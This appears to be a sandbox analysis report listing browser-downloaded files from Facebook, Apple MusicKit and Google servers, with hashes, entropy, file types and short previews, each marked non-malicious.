                                                                                                                                                                                                                                Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):15344
                                                                                                                                                                                                                                Entropy (8bit):7.984625225844861
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
                                                                                                                                                                                                                                MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                                                                                                                                                                                                SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                                                                                                                                                                                SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                                                                                                                                                                                SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                                                                                                Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):13872
                                                                                                                                                                                                                                Entropy (8bit):7.980300182065605
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:Gh6p+Tm8jirohmGIFmiK7Vo/JohQP7sWiPqo2GO:2bnjLb+K/kiRbO
                                                                                                                                                                                                                                MD5:00B14239442EE700C3F044E78B2255F4
                                                                                                                                                                                                                                SHA1:7A048ED492BCA6D58D15C3D28A52D9005F440842
                                                                                                                                                                                                                                SHA-256:425BD8EA4368AAC14378F2B1513C22966DCAC845D143837FC632D1E9C642F749
                                                                                                                                                                                                                                SHA-512:E831C585B5B01A72ED3E912EACF1087F10CD6A25DD29E538D3D6B875864952960CBE2C386281FFA7F159675256F778785A1C8E3AC460E26B575EE392734B2488
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://is1-ssl.mzstatic.com/image/thumb/PurpleSource221/v4/a2/40/7b/a2407b8d-1229-29f2-2166-ae4e7d9b9d36/73f75239-3ed1-4d96-a0c3-adbaf27f2875_1_iOS_6.7.jpg/230x0w.webp
                                                                                                                                                                                                                                Preview:RIFF(6..WEBPVP8X..............VP8 .5..P....*....>.T.H$"..i.PD...7Kw. S.d....^s.....o.<....7..=d~....X...../.........._.}......E.....y./.......................?.?..V.....oc<............................;.>r.[.;.....?.?........?.=.?......#.......>........y..........F.j6.Q.....m..l4.'.8.\H....m..<O..G.qN..B....Fr.K.,..-.I.q.].7;......).H.Bvl..>K..|..Z.a..#G.k..gX..){...#......@M.)!v9.jy9...GLe..q.....$L^.A........#a0..aR.h.Ox 66.p..B(v.t.....f_.i..2.|"..x.......H.L...$...;3r^.qt...].@t.|).U...5..6. 9"..R.>..y.>>..u.8.....]....#e(AA......A...T.6.6.%'m.oYt.m..U.)t......QSz."~+Y^...X...S)H..D..C%.............'.\.1Y"wN..1......DW...*......\..WV...n......;...6QT......E.j.uy.._.y!~..e....Z.9.Y.......o.>.3...E..R.UXM,....hcB. ..Y0..{..aiJ.{.....|.U.8k..D.1..U.8L..gdn........e...R........Pa?r.....<*.7_.~..II..!\.........kDH.......ZP..n.7v....U....h!Gk;o.......,obH.....U..0.....<..O:.m5Q5..>.R.k..U0&...4-..O.&..@..\....q".(..w..../$...D..:.A.:>..&
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4901)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):28366
                                                                                                                                                                                                                                Entropy (8bit):5.376121039685713
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:3dK9QwifftFUJ+4sPSPgx3b52eBwGEja4CFTDvVUczyL2FjAl+oM+NjX+P:wQ2aSPgx3h81PKFjAS
                                                                                                                                                                                                                                MD5:73B3BCEF1573E8E904764459C5C03E27
                                                                                                                                                                                                                                SHA1:938C9627FEFDF5D625C0C6E449FD65FCCA64962E
                                                                                                                                                                                                                                SHA-256:073A42ECC9A4844E45FE12A0CA272E0C72155D629B8E9D8667764CD63ADA89D9
                                                                                                                                                                                                                                SHA-512:483935D5A6F39C445FC357C8B6F4C60A792967FF9D0BB72EEAF55869792481E97ABFD64FA401FD18FF589ADDA7CB1A4E4F2D3980C4C4ABABAB1C944F73DDE787
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3ikJE4/yM/l/en_GB/H9hFVb-Q8_Q.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AbstractFBEmoji.react",["cx","react"],(function(a,b,c,d,e,f,g,h){"use strict";var i,j=i||d("react");function a(a){var b=a.children,c=a.size,d=a.src;a=a.title;c={height:c,width:c,fontSize:c,backgroundImage:"url('"+d+"')"};return j.jsx("span",{className:"_5mfr",title:a,children:j.jsx("span",{style:c,className:"_6qdm",children:b})})}a.displayName=a.name+" [from "+f.id+"]";g["default"]=a}),98);.__d("BadgeHelper",["cx","fbt","DOM","joinClasses"],(function(a,b,c,d,e,f,g,h){var i={xsmall:"_5dzz",small:"_5dz-",medium:"_5dz_",large:"_5d-0",xlarge:"_5d-1"},j={bot:"_64nf",verified:"_56_f",trending:"_1gop",topcommenter:"_59t2",page_gray_check:"_5n3t",page_gray_check_solid:"_6w81",work:"_5d62",game_blue:"_59c6",work_non_coworker:"_2ad7",work_official_badge:"_8b0y",work_official_badge_gray:"_8b-m",interest_community:"_3qcr",subscription:"_4fvy",inactive_user:"_7xv0",multi_company_group:"_9o_f"};c=h._("Official group");var k={bot:h._("Bot"),work_non_coworker:h._("Not part of y
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (9869)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):10413
                                                                                                                                                                                                                                Entropy (8bit):5.257533978847801
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:8nla2OCNzv/zCPfx1WY6Q8X4tYPNF9cxi3/lpemo+AW4mr+oaq5:8nl3OCRvbIfxkgUPRcxw/lpemoPW4mrb
                                                                                                                                                                                                                                MD5:1B5686244F6C6516B3C0CB73B85DEB30
                                                                                                                                                                                                                                SHA1:207E5F9CC6C80B1B84C18CDFA732A5C3CC43AE2B
                                                                                                                                                                                                                                SHA-256:3A91FF301DBC45B9035E65C7CACB68C5C06105196AB82BDE6AD6970348F2D819
                                                                                                                                                                                                                                SHA-512:73AC415260CAA2291E3F2A24393B226E1275A1981775E3AA4183B2ECC941872AEB3F1024756479FD56E26F3E27976607E576A835864892F547E17DA17A3B6A32
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://js-cdn.music.apple.com/musickit/v2/components/musickit-components//musickit-components.esm.js?t=1726695429822
                                                                                                                                                                                                                                Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.import{d as e,N as a,w as i,p as t,b as o}from"./p-1ec6e574.js";import{g as l}from"./p-42d04e97.js";(()=>{const o=Array.from(e.querySelectorAll("script")).find((e=>new RegExp(`/${a}(\\.esm)?\\.js($|\\?|#)`).test(e.src)||e.getAttribute("data-stencil-namespace")===a)),l={};return"onbeforeload"in o&&!history.scrollRestoration?{then(){}}:(l.resourcesUrl=new URL(".",new URL(o.getAttribute("data-resources-url")||o.src,i.location.href)).href,t(l))})().then((e
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4404)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):34412
                                                                                                                                                                                                                                Entropy (8bit):5.31102844088648
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:oIoGE4cvgEDyApHkiuszRJAvofgyOFveG/+aMijhv:oIoN4cvryXZsFiv8gyk/+aMiVv
                                                                                                                                                                                                                                MD5:DA8F8FAC361886D8D272965AC8D2CCE9
                                                                                                                                                                                                                                SHA1:A79B9AD169D5345C1AADCF059F127D374D7E368F
                                                                                                                                                                                                                                SHA-256:4D7FD4E0CBE75F60991A2D895E534C4C0FAA7FB68378D6F804371787CD3F0257
                                                                                                                                                                                                                                SHA-512:F815062EDCDF754EA3D300186B0C7117B54113902AA1EB37C91BF6D627C70AE4B4059240A4F12E5317ACECA1A084A6A739D520DA50F810771C00A7B016B01B56
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yM/l/0,cross/8K9cI3nQr0j.css"
                                                                                                                                                                                                                                Preview:#navLogin ._yl4{z-index:4}._yl4{position:relative;top:22px}._yl8{background-color:#f5f6f7;border:0 solid white;border-radius:3px;box-shadow:0 3px 8px rgba(0, 0, 0, .3);height:266px;padding-bottom:6px;text-align:center}._yl9{color:#7f7f7f;font-size:12px;line-height:14px;margin-bottom:10px;margin-top:16px}._yl8 ._yla{font-size:12px;height:28px;line-height:28px;min-width:68px}._yl4 ._yl7 .beeperNub{left:230px}._yl7._ylb{border:0 solid white;border-radius:3px;height:266px;right:-16px;top:35px;width:260px;z-index:1000}.._51u6{margin-bottom:-4px}._41uf,._41ug{display:inline-block;padding-right:14px;position:relative}._41uf .img{margin-left:1px;position:absolute;vertical-align:middle}._41ug .img{position:absolute;top:1px;vertical-align:middle}.#facebook ._-kb.mac{font-family:Helvetica Neue, Helvetica, Arial, sans-serif;-webkit-font-smoothing:subpixel-antialiased}#facebook ._-kb.sf{font-family:system-ui, -apple-system, BlinkMacSystemFont, '.SFNSText-Regular', sans-serif}@font-face{font-family:
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4490)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):17188
                                                                                                                                                                                                                                Entropy (8bit):5.523601084159109
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:E2PzxIwk6jqPSZUXV4jqPSZq17i+PV0vvnXhFawn8zVt9Pub6KS8BEUK582htJvh:lbxIwk6jqPSZUXV4jqPSZq17i+PV0vv4
                                                                                                                                                                                                                                MD5:4BF456ED44F476CA182A174331B0769E
                                                                                                                                                                                                                                SHA1:1DD833E61B5D88FD4404F1F876C5042523AB2419
                                                                                                                                                                                                                                SHA-256:17721B2B06911470866BF609A6BF205E806C5FB4CA4B6DA278984DB5B1F6F2C1
                                                                                                                                                                                                                                SHA-512:C406C0F6EEB84AA6CB64A45E2DFECD585EFD0C8BE4651FD7D17AA37489C48A8AADDD22691606400AE2D07803851DD08518E8F25E2800CCB00B160AB0A7D23D65
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/ys/r/pg8jih5T_9q.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("csx",[],(function(a,b,c,d,e,f){function a(a){throw new Error("csx: Unexpected class selector transformation.")}f["default"]=a}),66);.__d("getOrCreateDOMID",["uniqueID"],(function(a,b,c,d,e,f,g){function a(a){a.id||(a.id=c("uniqueID")());return a.id}g["default"]=a}),98);.__d("FocusEvent",["Event","Run","ge","getOrCreateDOMID"],(function(a,b,c,d,e,f,g){"use strict";var h={},i=!1;function j(a,b){if(h[a]){b=h[a].indexOf(b);b>=0&&h[a].splice(b,1);h[a].length===0&&delete h[a]}}function k(a){var b=a.getTarget();if(h[b.id]&&h[b.id].length>0){var c=a.type==="focusin"||a.type==="focus";h[b.id].forEach(function(a){a(c)})}}function l(){if(i)return;c("Event").listen(document.documentElement,"focusout",k);c("Event").listen(document.documentElement,"focusin",k);i=!0}function a(a,b,e){e===void 0&&(e={cleanupOnLeave:!0});l();var f=c("getOrCreateDOMID")(a);h[f]||(h[f]=[]);h[f].push(b);var g=!1;function i(){g||(j(f,b),k&&(k.remove(),k=null),g=!0)}var k=((a=e)==null?void 0:a.cleanu
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:M3U playlist, ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):789
                                                                                                                                                                                                                                Entropy (8bit):5.334449178191508
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:PNfsAAjdxPVGIdxeTdxly7dxPdx76dxisdxI5:lfRcdpcIdATdwdVdZ6dssdM
                                                                                                                                                                                                                                MD5:BFD437AC6F199108032972C3BD8173CC
                                                                                                                                                                                                                                SHA1:E934C27E6207D4C316EC8313C94B898452E8613B
                                                                                                                                                                                                                                SHA-256:1E3746CB4C2F76B60E1F76B6828F1BC6C19B9795330CB6E7FFBA4C775C30E82F
                                                                                                                                                                                                                                SHA-512:8CB2FC52CF8C65D50F15913C37ACD30B11324F0845C07C4DED62B566D2B56005C46C48C1DE4FC46611028B10BC9602ECDB8CB21F2B9FDA6C4BCA02DFCF002B05
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:#EXTM3U.#EXT-X-TARGETDURATION:6.#EXT-X-VERSION:7.#EXT-X-MEDIA-SEQUENCE:0.#EXT-X-PLAYLIST-TYPE:VOD.#EXT-X-INDEPENDENT-SEGMENTS.#EXT-X-MAP:URI="P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4",BYTERANGE="822@0".#EXTINF:5.99075,..#EXT-X-BYTERANGE:95176@822.P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4.#EXTINF:5.99075,..#EXT-X-BYTERANGE:102413@95998.P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4.#EXTINF:5.99075,..#EXT-X-BYTERANGE:97049@198411.P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4.#EXTINF:5.99075,..#EXT-X-BYTERANGE:96885@295460.P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4.#EXTINF:5.99075,..#EXT-X-BYTERANGE:102639@392345.P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4.#EXTINF:0.11014,..#EXT-X-BYTERANGE:367@494984.P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4.#EXT-X-ENDLIST.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):28
                                                                                                                                                                                                                                Entropy (8bit):4.2359263506290326
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:QQinPt:+Pt
                                                                                                                                                                                                                                MD5:1505E9BB79B4C3F51AEC072BFF0E4F1D
                                                                                                                                                                                                                                SHA1:C2229235760065DD7708E3D63A718B05FF209F37
                                                                                                                                                                                                                                SHA-256:C3E80C02DBB99150A42F8867CFC2BD1565E9B7DE84EB4F3D75C9AF0A674566D1
                                                                                                                                                                                                                                SHA-512:C0B996819ED4D93E5D5158867080BC16B479FD2EE651FD4F56453ABCEF6F5B5C67BB6E313D29971A61BE963BE67F4483939B89DDBB711B647453F7A0B966D47C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlsWRjmpfP_yhIFDXhvEhkSBQ3OQUx6?alt=proto
                                                                                                                                                                                                                                Preview:ChIKBw14bxIZGgAKBw3OQUx6GgA=
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):95
                                                                                                                                                                                                                                Entropy (8bit):4.381705050636977
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3sdsXxqtQAltjp:6v/lhPfkCDtmywFWsXxWVXjp
                                                                                                                                                                                                                                MD5:39C11D656220EFD52F4965400D14900A
                                                                                                                                                                                                                                SHA1:327050099CEE8D1AD81E7BFBE5CA2EA057780A87
                                                                                                                                                                                                                                SHA-256:C0F9968D0FA5F4DEFF86BABCCD6DF52306138314607A6F3F0ACD2E7AFC783D1C
                                                                                                                                                                                                                                SHA-512:B64595AD189620EA7A10715B0F84C30134CAA4BAB0F7FBA8E53438577BD33310939F2B4FACCC4D7152A3B279B641436E84211DB06FA9DB50FC0E9A1E83760B63
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/O7nelmd9XSI.png
                                                                                                                                                                                                                                Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS..31x....IDAT..c`........5.....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6573)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):10849
                                                                                                                                                                                                                                Entropy (8bit):5.551671316058498
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:sn0g/f3O/+IErEeyKEIffWEeyU/gcLCqrFoxPGRmSREzmOtKs+xrDEyvZ:huk+I6EeyKEIWEeyCgqwPGRmSRymOQ5l
                                                                                                                                                                                                                                MD5:FB4650E82A5A32490F5B1D4B85594CD7
                                                                                                                                                                                                                                SHA1:ECCED02FA31FA36FD1CFA9B4C52200EF726EE357
                                                                                                                                                                                                                                SHA-256:5FB29C66A3EDA461A11E8DAE54FCFF64E73C23D6B67A5232FC23F417719D8EBB
                                                                                                                                                                                                                                SHA-512:E0E901B61153CC5FE8C8D216C391BFC78FE72E993F55098EFEBE7E4315F22C722D0E1D617F3A6B682092DFB41A91280963502F4096386EEA18EBF3FDF722EF87
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/aJoeSHn7XcN/. */.__d("blakejs-1.1.0",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){var a="Input must be an string, Buffer or Uint8Array";function b(b){var c;if(b instanceof Uint8Array)c=b;else if(b instanceof Buffer)c=new Uint8Array(b);else if(typeof b==="string")c=new Uint8Array(Buffer.from(b,"utf8"));else throw new Error(a);return c}function c(a){return Array.prototype.map.call(a,function(a){return(a<16?"0":"")+a.toString(16)}).join("")}function d(a){return(4294967296+a).toString(16).substring(1)}function e(a,b,c){var e="\n"+a+" = ";for(var f=0;f<b.length;f+=2){if(c===32)e+=d(b[f]).toUpperCase(),e+=" ",e+=d(b[f+1]).toUpperCase();else if(c===64)e+=d(b[f+1]).toUpperCase(),e+=d(b[f]).toUpperCase();else throw new Error("Invalid size "+c);f%6===4?e+="\n"+new Array(a.length+4).join(" "):f<b.length-2&&(e+=" ")}}function f(a,b,c){var d=new Date().getTime(),e=new Uint8Array(b);for(var f=0;f<
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):11894
                                                                                                                                                                                                                                Entropy (8bit):7.98342607811884
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:dcYaJBNV6lne4iMA2YBrAvCIODgv9T1cGrK/Mb9O66bK+v/FiM:dVaWlwMAnqvCIODgnpUq9Ole+v/FT
                                                                                                                                                                                                                                MD5:4D44567B356D4E4FAEBE3A88FDB84B84
                                                                                                                                                                                                                                SHA1:EC4D3AEB588CC0BE162D790A0FC75B24096139E3
                                                                                                                                                                                                                                SHA-256:98FAD711CCCE1DE287BB8A98006D5231F52AFA9921CC5D637C583B41E1B9ACEC
                                                                                                                                                                                                                                SHA-512:60EBB4691889FE1C58202E698C8DCF1C39E7648F9F36601FA33AB370FE2A0CCC521B6C774E4F66CA9ADE361C81A7383F85D419986AF804390253D50C5F7679F1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFFn...WEBPVP8 b........*..(.>a(.E$"....L@....8....w5.....a.<?.o.. .'./.~........>[.........%.3...Of_...{..........g.K.W......{......Y......./...?......w.{......./M........q>..g............._F...7...*^.......!|a......?....].........[..........g._..B...........~.........c..{..0.....'...~....g.O.............?.......././.o........].w./._....7..=.~....:.s...C..R...s.9_.}?..q930..!7....O...JD2.fp..372%.......r..kdq...1h.i...y./-`.H..*.L..u..umo.9.....#.KYh.6H!4{:.@.Q.g.Z.J7......8...C..$TP..G....I@.9}....b.....-o...W.Y..bZs...X...MQy8I..5.Z..?...Z.OvI..s....]..xL...z.UHL2.1..l.......g].=...Zw..i.K...=.|.Z\....P.st.S~....D.Q...O.qv....Y.b..4(............i.rRd..........:f.!I%R/C...n.DM.!.B_.D.T.*8%...+.t.....0.c...}.....;...&.....R...Z..,fqJ.i..6.LR..O.%....'`..c.......b./+|........q1<.=6.w.....e.v=...m.36..b.V...w....|.c...,........>..c...w.C...y.9&./."..\0=q^X?sN`#...X.........G.......>k.9........@.<.;.4.r$R.1[.&..~b.9..A....z.-...@..i...%.o.'`..f;..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (61139)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):194466
                                                                                                                                                                                                                                Entropy (8bit):5.336992588836603
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:gcFoGok4WOTbDklxWB36TI6CY370xVwC2+XGew73rtBbDGI9lrWqFqzLD64NZgpk:cnUxe6JzkxW3rblKoer
                                                                                                                                                                                                                                MD5:6D68A3BF7B28FEE7F86686BBEFD5A1A7
                                                                                                                                                                                                                                SHA1:06343B5F2235C6AF82241D7BD52FA816AB5609BF
                                                                                                                                                                                                                                SHA-256:BA4C9C8335FCFB302860B21655EA2EB26063A71C1153C216CFC328B55DD44471
                                                                                                                                                                                                                                SHA-512:FA5738FC767CAB178B4A1F3BDE2617A8DF0C13C99A64EED49B4A3FE478955CC8D41FC092B7376FBED28DFF54E814215705475F52B4350A06E1C100633EFAE5EC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yx/l/0,cross/e3WW2lRt6d_.css"
                                                                                                                                                                                                                                Preview:._7w5n{-webkit-appearance:none;background:none;border:none;cursor:pointer;padding:0}.._70au{background-color:#000;display:inline-block}._70aw{background:rgba(0, 0, 0, .5)}._70a-{align-items:flex-start;display:flex;flex-flow:row nowrap}._70av{background:#fff;border:solid 2px #c6c9cc;border-spacing:0;display:block;height:60px;position:relative;width:114px}._70as._70ao{height:78px;width:78px}._70a_{display:flex;flex-direction:row;width:100%}._70ax{cursor:pointer;display:inline-block;height:fit-content;max-height:max-content;max-width:max-content;width:fit-content}._70as{background-color:#e9eaeb;border:1px solid #dadcde;color:#212a34;cursor:pointer;height:80px;width:153px}._70ai{bottom:8px;position:absolute;right:8px}._70ay{display:block}._70as._1tp7:not(:focus){background:#E9EAEB url(/rsrc.php/v3/yu/r/PmjSkvyqVM-.png) no-repeat right 8px top 8px}._70at{border:1px solid #fa3e3e}._70az{background-color:#f5f7f8}.x1-5 ._70as._1tp7:not(:focus),.x2 ._70as._1tp7:not(:focus){background-image:url(
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:exported SGML document, ASCII text, with very long lines (31220)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):50088
                                                                                                                                                                                                                                Entropy (8bit):5.4168756881776705
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:QT3Cl3UR5FlxRBsVZI2r4vlroHKay9/KUbBfNfGg2TnDdQs5CNthxTB3eARGTB:CBbFlxRurPAYfWs5sB3m
                                                                                                                                                                                                                                MD5:9923E44E3A1C3B76ACAFF0880CC06AB7
                                                                                                                                                                                                                                SHA1:75FD70940452C4804CA6C6DF2A7BEF31ADC2BF82
                                                                                                                                                                                                                                SHA-256:8726494E52BF0A93133D578698DEADE14D856A1836D8DF00CFC975E5FE1307E4
                                                                                                                                                                                                                                SHA-512:A7F7EC56F98B3F77C9BAB8C44BC405D280A295AAEC10688534815B1FB9B49A68453B2039CA622D033E9C868E97FE9927EF5EC2C52F82C50AD74EBAB7F26468B6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AsyncDOM",["CSS","DOM","FBLogger"],(function(a,b,c,d,e,f){a={invoke:function(a,c){for(var d=0;d<a.length;++d){var e=a[d],f=e[0],g=e[1],h=e[2];e=e[3];h=h&&c||null;g&&(h=b("DOM").scry(h||document.documentElement,g)[0]);h||b("FBLogger")("async_dom").warn("Could not find relativeTo element for %s AsyncDOM operation based on selector: %s",f,g);switch(f){case"hide":b("CSS").hide(h);break;case"show":b("CSS").show(h);break;case"setContent":b("DOM").setContent(h,e);break;case"appendContent":b("DOM").appendContent(h,e);break;case"prependContent":b("DOM").prependContent(h,e);break;case"insertAfter":b("DOM").insertAfter(h,e);break;case"insertBefore":b("DOM").insertBefore(h,e);break;case"remove":b("DOM").remove(h);break;case"replace":b("DOM").replace(h,e);break;default:b("FBLogger")("async_dom").warn("Received invalid command %s for AsyncDOM operation",f)}}}};e.exports=a}),null);.__d("AsyncResponse",["invariant","Bootloader","FBLogger","HTML","WebDriverConfig"],(function(a,b
